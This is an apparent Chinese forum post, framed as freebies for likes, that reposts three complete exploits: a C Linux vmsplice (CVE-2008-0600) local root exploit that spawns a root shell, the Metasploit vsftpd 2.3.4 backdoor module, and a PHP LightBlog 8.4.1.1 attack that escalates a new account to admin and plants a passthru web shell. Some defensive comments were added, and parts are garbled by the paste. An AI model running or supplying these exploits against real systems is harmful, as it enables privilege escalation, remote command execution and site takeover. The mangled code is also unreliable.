
快快快来赞我。有福利哦

快赞我,我给大家发福利

Linux vmsplice Local Root Exploit
/*
* hackerial.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By Hackeri-AL UAHCrew
*
* Linux 2.6.18 - 2011
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remember the original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include


#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)


/*
 * Userland mirror of the kernel's `struct page`, laid out the way this
 * exploit expects it. main() fills objects of this shape into pages it
 * maps at fixed addresses and stores the address of kernel_code() in
 * lru.next. Field order and widths are those of the 2.6-era kernels this
 * was written for -- assumed from the code, not verified here -- so the
 * layout is not portable across kernel versions.
 */
struct page {
unsigned long flags;              /* main() sets bit PG_compound (14) */
int count;                        /* main() sets this to 1 */
int mapcount;
unsigned long private;            /* main() points this at the page itself */
void *mapping;
unsigned long index;
struct { long next, prev; } lru;  /* lru.next receives (long) kernel_code */
};


/*
 * exit_code is the user-mode continuation defined below (after kernel_code);
 * exit_stack is the 1 MiB stack exit_kernel() switches to when it returns
 * to user mode (see the STACK() macro, which points 40 bytes below its end).
 */
void exit_code();
char exit_stack[1024 * 1024];


/*
 * Report a failure on stdout and terminate the process with status 1.
 *
 * msg: short description of what failed, printed after "[-] ".
 * err: errno value whose strerror() text is appended, or 0 to print msg
 *      on its own.
 *
 * Both standard streams are flushed first so earlier banner output is not
 * lost when the process exits. Never returns.
 */
void die(char *msg, int err)
{
if (err) {
printf("[-] %s: %s\n", msg, strerror(err));
} else {
printf("[-] %s\n", msg);
}
fflush(stdout);
fflush(stderr);
exit(1);
}


#if defined (__i386__)


#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif


#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246


/*
 * i386: leave kernel mode from inside kernel_code(). Writes an iret frame
 * onto the current stack -- ss, esp, eflags, cs, eip from the top down --
 * using the user-mode selectors defined above, with esp pointing into
 * exit_stack and eip at exit_code, then executes iret. The store order and
 * offsets are exactly what iret consumes; do not reorder. always_inline so
 * no call frame is left behind on the kernel stack.
 */
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
/* 0x10: ss, 0x0c: esp, 0x08: eflags, 0x04: cs, 0x00: eip */
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}


/*
 * i386: return the word stored at the base of the current 8 KiB-aligned
 * kernel stack (esp & ~8191), which on the 2.6-era kernels this targets is
 * the task pointer (`current`) in thread_info. Layout-specific; newer
 * kernels keep `current` elsewhere. Only meaningful when executed in
 * kernel mode from kernel_code().
 */
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}


#elif defined (__x86_64__)


#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif


#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246


/*
 * x86_64: leave kernel mode from inside kernel_code(). swapgs switches back
 * to the user GS base, then an iretq frame is written onto the current stack
 * -- ss, rsp, rflags, cs, rip from the top down -- using the user-mode
 * selectors defined above, with rsp pointing into exit_stack and rip at
 * exit_code. The store order and offsets are what iretq consumes; do not
 * reorder. always_inline so no call frame is left on the kernel stack.
 */
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
/* 0x20: ss, 0x18: rsp, 0x10: rflags, 0x08: cs, 0x00: rip */
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}


/*
 * x86_64: return the 64-bit word at %gs:0, which this exploit assumes is
 * the per-cpu `current` task pointer on the kernels it targets (assumption
 * from the code; verify against the target kernel's per-cpu layout). Only
 * meaningful when executed in kernel mode from kernel_code().
 */
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}


#else
#error "unsupported arch"
#endif


#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)


#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif


/* Caller's real uid/gid, captured in main(). kernel_code() searches for four
 * copies of uid followed by four copies of gid, so both must be non-zero
 * (main() refuses to run otherwise). */
static uint uid, gid;


/*
 * kernel_code -- the ring-0 payload. The intended entry is through the
 * lru.next pointer that main() stores in its fake page descriptors. Starting
 * at get_current(), it scans up to 1024-13 words for four copies of uid
 * followed by four copies of gid (the current task's credential words on
 * the kernels this was written for), zeroes all eight, skips one
 * pointer-sized word, sets the next three words to all-ones (their meaning
 * is kernel-layout dependent and not given here), and leaves the kernel via
 * exit_kernel(). Every offset is tied to old 2.6 task layouts.
 *
 * Defensive context: the bug being abused is CVE-2008-0600 (vmsplice did
 * not validate the user-supplied iovec), affecting 2.6.17 through 2.6.24.1
 * and fixed in 2.6.24.2; the header's "2.6.18 - 2011" is the poster's claim,
 * not the CVE range. Current kernels additionally reject the very low
 * MAP_FIXED mappings main() relies on through vm.mmap_min_addr.
 */
void kernel_code()
{
int i;
uint *p = get_current();


for (i = 0; i < 1024-13; i++) {
if (p[0] == uid &amp;&amp; p[1] == uid &amp;&amp; p[2] == uid &amp;&amp; p[3] == uid &amp;&amp; p[4] == gid &amp;&amp; p[5] == gid &amp;&amp; p[6] == gid &amp;&amp; p[7] == gid) {
/* credential block found: clear the eight uid/gid words */
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
/* step past one pointer-sized word, then set three words to ~0 */
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}
exit_kernel();
}
/*
 * exit_code -- user-mode continuation reached from exit_kernel(); main()
 * also installs it as the SIGPIPE handler even though it takes no int
 * argument (prototype mismatch tolerated by the old `void exit_code();`
 * declaration). Aborts unless getuid() is now 0, then execs an interactive
 * bash with HISTFILE pointed at /dev/null.
 * Detection note: a root bash whose parent is an unprivileged user's
 * process and whose environment carries HISTFILE=/dev/null is one signal
 * worth correlating.
 */
void exit_code()
{
if (getuid() != 0)
die("wtf", 0);
printf("[+] root
");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}
/*
 * main -- builds the fake kernel objects and triggers the bug. argc/argv
 * are unused. Steps:
 *  1. pin real/effective/saved ids to the caller's own and refuse to run
 *     when already uid or gid 0;
 *  2. map three single pages at fixed addresses and fill them in as
 *     `struct page` objects (PG_compound set, count 1, private pointing at
 *     itself) whose lru.next is kernel_code;
 *  3. map a (PIPE_BUFFERS*3+2)-page buffer, shorten it by two pages and
 *     unmap the page right after the shortened region;
 *  4. open a pipe, close its read end, route SIGPIPE to exit_code, and call
 *     vmsplice on the buffer with iov_len = ULONG_MAX.
 * If _vmsplice returns at all the request was rejected (a patched kernel)
 * and die() reports errno; the trailing return 0 is unreachable.
 * Note: the "%lx" conversions below are fed pointers, which is why the
 * header asks for -Wno-format; "%p" would be the correct specifier.
 */
int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];
uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);
printf("-----------------------------------
");
printf(" Linux vmsplice Local Root Exploit
");
printf(" By Hackeri-AL
");
printf("-----------------------------------
");
if (!uid || !gid)
die("!@#$", 0);
/* Fake descriptor #1. The int[2] punning yields address 0 on i386 and
 * PAGE_SIZE<<32 on x86_64 (little-endian); pages[1] is the next descriptor
 * in the same mapping. MAP_FIXED this low is what vm.mmap_min_addr blocks. */
pages[0] = *(void **) &amp;(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx
", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx
", pages[0]);
printf("[+] page: 0x%lx
", pages[1]);
pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;


/* Fake descriptor #2 at the address held in the first word of #1 -- that
 * is its flags field, i.e. 1 << PG_compound (0x4000) after the line above. */
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;


map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);


memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx
", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx
", pages[2]);
printf("[+] page: 0x%lx
", pages[3]);


pages[2]->flags = 1 << PG_compound; pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;


/* Fake descriptor #3 at PAGE_SIZE (int[2]{PAGE_SIZE,0} reads as PAGE_SIZE
 * on both architectures); only mapped and zeroed, no fields are set. */
pages[4] = *(void **) &amp;(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx
", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx
", pages[4]);


/* The buffer handed to vmsplice: PIPE_BUFFERS*3+2 pages, anywhere. */
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);


memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx
", map_addr, map_addr + map_size);


/* Drop two pages from the length and unmap the page immediately after the
 * shortened region (the last page of the mapping stays mapped). */
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);


/* Write end only; the read end is closed, so any SIGPIPE raised while
 * writing is delivered to exit_code (installed below). */
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);


/* iov_len = ULONG_MAX is the unvalidated length at the heart of
 * CVE-2008-0600; a fixed kernel rejects it and _vmsplice returns. */
iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;


signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &amp;iov, 1, 0);
die("vmsplice", errno);
return 0;
}





















VSFTPD v2.3.4 Backdoor 命令执行漏洞
##
# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



require msf/core

# Metasploit module for the vsftpd 2.3.4 backdoor (CVE-2011-2523): the
# trojaned 2.3.4 tarball spawned a shell on TCP/6200 once an FTP login used
# a USER name containing ":)". This is the listing as pasted on the forum --
# the page has stripped string quotes and argument commas throughout (e.g.
# `Name => VSFTPD ...`, `get_once(-1 30)`), so it will not load as-is; the
# canonical copy ships with the Metasploit Framework as
# vsftpd_234_backdoor.rb.
# Defensive notes: alert on FTP USER commands containing ":)" and on
# unexpected listeners on 6200/tcp; verify release tarball signatures or
# hashes before building from source.
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

# Module metadata: one "Automatic" target, a cmd_interact payload delivered
# over the already-open socket (ConnectionType find), default RPORT 21.
def initialize(info = {})
super(update_info(info
Name => VSFTPD v2.3.4 Backdoor Command Execution
Descript_ion => %q{
This module exploits a malicious backdoor that was added to the VSFTPD download
archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
June 30th 2011 and July 1st 2011 according to the most recent information
available. This backdoor was removed on July 3rd 2011.
}
Author => [ hdm mc ]
License => MSF_LICENSE
Version => $Revision: 13099 $
References =>
[
[ URL http://pastebin.com/AetT9sS5]
[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
]
Privileged => true
Platform => [ unix ]
Arch => ARCH_CMD
Payload =>
{
Space => 2000
BadChars =>
DisableNops => true
Compat =>
{
PayloadType => cmd_interact
ConnectionType => find
}
}
Targets =>
[
[ Automatic { } ]
]
DisclosureDate => Jul 3 2011
DefaultTarget => 0))

register_options([ Opt::RPORT(21) ] self.class)
end

# If 6200/tcp already answers, hand it straight to handle_backdoor.
# Otherwise connect to the FTP port, send a random USER ending in ":)"
# (the trigger) and a random PASS, then try 6200/tcp again. A 530 reply is
# treated as anonymous-only and anything other than 331 as unexpected; in
# both cases the module disconnects without trying the backdoor port.
def exploit

nsock = self.connect(false {RPORT => 6200}) rescue nil
if nsock
print_status(The port used by the backdoor bind listener is already open)
handle_backdoor(nsock)
return
end

# Connect to the FTP service port first
connect

banner = sock.get_once(-1 30).to_s
print_status(Banner: #{banner.strip})

# The ":)" suffix on the user name is the backdoor trigger.
sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
)
resp = sock.get_once(-1 30).to_s
print_status(USER: #{resp.strip})

if resp =~ /^530 /
print_error(This server is configured for anonymous only and the backdoor code cannot be reached)
disconnect
return
end

if resp !~ /^331 /
print_error(This server did not respond as expected: #{resp.strip})
disconnect
return
end

sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}
)

# Do not bother reading the response from password just try the backdoor
nsock = self.connect(false {RPORT => 6200}) rescue nil
if nsock
print_good(Backdoor service has been spawned handling...)
handle_backdoor(nsock)
return
end

disconnect

end

# Sanity-check the listener on 6200/tcp by sending `id` and requiring
# "uid=" in the reply, then run the encoded payload under nohup on that
# socket and pass it to the framework's handler.
def handle_backdoor(s)

s.put(id
)

r = s.get_once(-1 5).to_s
if r !~ /uid=/
print_error(The service on port 6200 does not appear to be a shell)
disconnect(s)
return
end

print_good(UID: #{r.strip})

s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)
handler(s)
end

end



















LightBlog 8.4.1.1 远程代码执行漏洞
安装 PHP.EXE,在 CMD 下执行。以下为 PHP Exploit,保存为 *.PHP:
#!/usr/bin/php -q -d short_open_tag=on
<?
/*
 * LightBlog 8.4.1.1 remote code execution, as pasted (a single-line paste;
 * the newlines that were inside string literals survive below as raw line
 * breaks, and the `//` comments in the middle of some lines therefore
 * swallow the code that follows them up to the next break).
 * Usage: php <this file> host path [cmd...]. The chain is: register a user
 * (Piggy_Marty), promote it to admin through cp_memberedit.php, upload a
 * PHP file through the post form's "image" field so it lands under images/,
 * request it so it writes a second PHP file that runs $_GET[cmd] through
 * passthru() between "666999" markers, then fetch that file with the
 * command. Session state is carried as plaintext username/password cookies.
 * Defender notes: indicators are a new account named Piggy_Marty, POSTs to
 * cp_memberedit.php carrying type_post=admin, and .php files under images/.
 * Mitigations: enforce the admin check on role changes server-side,
 * allow-list upload extensions and content types, and serve the upload
 * directory with script execution disabled.
 */
echo "LightBlog 8.4.1.1 Remote Code Execution Exploitby BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>Thanks to rgod for the php code and Marty for the Love";if ($argc<3) {echo "Usage: php ".$argv[0]." Host Path Host:          target server (ip/hostname)Path:          path of lightblogExample:php ".$argv[0]." localhost /lightblog/ dir";die;}error_reporting(0);ini_set("max_execution_time",0);ini_set("default_socket_timeout",5);
/* quick_dump: hex plus printable-ASCII dump of $string, 15 bytes per row.
 * Not called anywhere in this listing. */
function quick_dump($string){  $result='';$exa='';$cont=0;  for ($i=0; $i<=strlen($string)-1; $i++)  {   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))   {$result.="  .";}   else   {$result.="  ".$string[$i];}   if (strlen(dechex(ord($string[$i])))==2)   {$exa.=" ".dechex(ord($string[$i]));}   else   {$exa.=" 0".dechex(ord($string[$i]));}   $cont++;if ($cont==15) {$cont=0; $result.="
"; $exa.="
";}  }return $exa."
".$result;}$proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})';
/* sendpacketii: send one raw HTTP request to $host:$port (or through
 * $proxy when set) and collect the whole reply into the global $html.
 * The proxy regex above appears to have lost its backslashes in the paste,
 * and eregi() no longer exists in PHP 7+, so this does not run unmodified on
 * a current interpreter. */
function sendpacketii($packet){  global $proxy, $host, $port, $html, $proxy_regex;  if ($proxy=='') {    $ock=fsockopen(gethostbyname($host),$port);    if (!$ock) {      echo 'No response from '.$host.':'.$port; die;    }  }  else {        $c = preg_match($proxy_regex,$proxy);    if (!$c) {      echo 'Not a valid proxy...';die;    }    $parts=explode(':',$proxy);    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...
";    $ock=fsockopen($parts[0],$parts[1]);    if (!$ock) {      echo 'No response from proxy...';die;        }  }  fputs($ock,$packet);  if ($proxy=='') {    $html='';    while (!feof($ock)) {      $html.=fgets($ock);    }  }  else {    $html='';    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {      $html.=fread($ock,1);    }  }  fclose($ock);}
/* Argument handling: host, path (must start and end with '/'), then the
 * remaining arguments joined into the command; port fixed at 80, no proxy. */
$host=$argv[1];$path=$argv[2];$cmd="";for ($i=3; $i<=$argc-1; $i++){$cmd.=" ".$argv[$i];}$cmd=urlencode($cmd);$port=80;$proxy="";if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
/* Step 0: if images/piggy_marty.php already exists, run the command and
 * stop; success is recognised by the 666999 markers in the reply. */
echo "Step 0 - If Shell already exists, run it..
";$packet ="GET ".$p."images/piggy_marty.php?cmd=$cmd HTTP/1.0
";$packet.="Host: ".$host."
";$packet.="Connection: Close

";sendpacketii($packet);if (strstr($html,"666999")){  echo "Exploit succeeded...
";  $temp=explode("666999",$html);  die("
".$temp[1]."
");}
/* Step 1: scrape the rand/val confirmation codes from register.php and
 * register the user. Note the `//` comment on the next line runs to the raw
 * line break and therefore swallows the `$packet =` assignment after it. */
echo 'Step 1 - Creating New User (Name: Piggy_Marty Pwd: DAFORNO_IMPERAT)..';//Retrieving the "confirmation" code$packet ="GET ".$p."register.php HTTP/1.0
";$packet.="Host: ".$host."
";$packet.="Connection: Close

";sendpacketii($packet);preg_match('#<b>([a-zA-Z0-9]+?)</b><input name="rand" type="hidden" value="([a-zA-Z0-9]+?)" />#is', $html, $fuori);$conf_code = $fuori[1];$rand_code = $fuori[2];//Doing the registration$data="rand=$rand_code&amp;val=$conf_code&amp;username_post=Piggy_Marty&amp;pwd1_post=DAFORNO_IMPERAT&amp;pwd2_post=DAFORNO_IMPERAT&amp;name_post=Piggy_Marty&amp;email_post=hawkgotyou@gmail.com";$packet="POST ".$p."register.php HTTP/1.0
";$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*
";$packet.="Accept-Language: it
";$packet.="Content-Type: application/x-www-form-urlencoded
";$packet.="Accept-Encoding: gzip, deflate
";$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
";$packet.="Host: localhost
";$packet.="Content-Length: ".strlen($data)."
";$packet.="Connection: Close
";$packet.="Cache-Control: no-cache

";$packet.=$data;sendpacketii($packet);sleep(1);
/* Step 2: POST type_post=admin to cp_memberedit.php with no session at all
 * -- the missing authorization check this exploit depends on. */
echo 'Step 2 - Promoting Piggy_Marty to admin level..';$data="type_post=admin&amp;username_post=Piggy_Marty";$packet="POST ".$p."cp_memberedit.php HTTP/1.0
";$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*
";$packet.="Accept-Language: it
";$packet.="Content-Type: application/x-www-form-urlencoded
";$packet.="Accept-Encoding: gzip, deflate
";$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
";$packet.="Host: localhost
";$packet.="Content-Length: ".strlen($data)."
";$packet.="Connection: Close
";$packet.="Cache-Control: no-cache

";$packet.=$data;sendpacketii($packet);sleep(1);
/* Step 3: multipart POST to main.php, authenticated by the plaintext
 * Lightblog_username/Lightblog_password cookies, whose "image" part is a
 * .php file -- an unrestricted upload into images/. */
echo 'Step 3 - Uploading Shell Creator..';$data="-----------------------------7d529a1d23092a
";$data.="Content-Disposition: form-data; name="image"; filename="piggy_marty_creator.php"
";$data.="Content-Type:

";$data.="<?php$fp=fopen('piggy_marty.php','w');fputs($fp,'<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {$_GET[cmd]=stripslashes($_GET[cmd]);}echo 666999;passthru($_GET[cmd]);echo 666999;?>');fclose($fp);chmod('piggy_marty.php',777);?>
";$data.='-----------------------------7d529a1d23092aContent-Disposition: form-data; name="title"Not so good if you see this..-----------------------------7d529a1d23092aContent-Disposition: form-data; name="post"An Exploit has attacked your site.. contact hawkgotyou@gmail.com for more details-----------------------------7d529a1d23092a--';$packet="POST ".$p."main.php HTTP/1.0
";$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*
";$packet.="Referer: http://".$host.$path."/
";$packet.="Cookie: Lightblog_username=Piggy_Marty&amp;Lightblog_password=DAFORNO_IMPERAT
";$packet.="Accept-Language: it
";$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a
";$packet.="Accept-Encoding: gzip, deflate
";$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
";$packet.="Host: ".$host."
";$packet.="Content-Length: ".strlen($data)."
";$packet.="Connection: Close
";$packet.="Cache-Control: no-cache

";$packet.=$data;sendpacketii($packet);sleep(1);
/* Step 4: request the uploaded file once so it writes piggy_marty.php. */
echo 'Step 4 - Executing Creator..';$packet ="GET ".$p."images/piggy_marty_creator.php HTTP/1.0
";$packet.="Host: ".$host."
";$packet.="Connection: Close

";sendpacketii($packet);sleep(1);
/* Step 5: same request as Step 0, now against the freshly written file. */
echo "Step 5 - Execute Commands..
";$packet ="GET ".$p."images/piggy_marty.php?cmd=$cmd HTTP/1.0
";$packet.="Host: ".$host."
";$packet.="Connection: Close

";sendpacketii($packet);if (strstr($html,"666999")){  echo "Exploit succeeded...
";  $temp=explode("666999",$html);  die("
".$temp[1]."
");}# Coded With BH Fast Generator v0.1?>

















